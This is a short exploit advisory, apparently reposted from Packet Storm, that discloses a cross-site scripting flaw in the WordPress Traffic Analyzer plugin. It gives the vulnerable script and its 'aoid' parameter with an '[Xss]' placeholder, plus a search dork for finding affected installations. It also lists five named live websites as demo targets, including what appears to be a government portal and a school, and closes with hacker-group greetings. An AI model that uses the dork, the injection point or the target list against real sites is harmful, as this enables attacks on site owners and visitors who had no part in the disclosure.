WordPress Traffic Analyzer Cross Site Scripting

[Kwelwild]

WordPress Traffic Analyzer third-party plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.

################################################################################
#
# Exploit Title : WordPress Trafficanalyzer Plugin XSS Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Beni_Vanda
#
# Home          : http://IrIsT.Ir/en/
#
# Software Link : http://wptrafficanalyzer.in 
#
# Security Risk : Medium
#
# Version       : All Version
#
# Tested on     : GNU/Linux (Ubuntu/BT/Fedora) - win7
#
# Dork          : inurl:js/ta_loaded.js.php?aoid=
#
################################################################################
#
#  Expl0iTs :
#
#  http://target/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
#
#
# D3mo :
#
# http://www.nldtrondheim.net/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
# http://brussac.lagalite.net/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
# http://gym-n-kydon.chan.sch.gr/sxoleio/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
# http://www.doe.gov.my/portal/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
# http://valkunas.ftmc.lt/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss]
#
################################################################################
#
#  Greats : Am!r - C0dex - B3HZ4D - TaK.FaNaR - Dead.Zone - 0x0ptim0us - skote_vahshat
#
#  black_king - Mr.XHat - m3hdi - F@rid - Dr.Tofan - Dj.TiniVini - () - sajjad11&13 
#  
#  MR.AN0NYM - Silent - Dr.Koderz - Z3r0 - Mr.Zer0 - Megatron - x3o-1337 -  asesino04 
#
#  Sukhoi Su-37 - Cyber_Injection - Smart_Programmer - IR Anonymous &&
#
#  All Members In Www.IrIsT.Ir/forum
#
################################################################################

Sursa: WordPress Traffic Analyzer Cross Site Scripting ? Packet Storm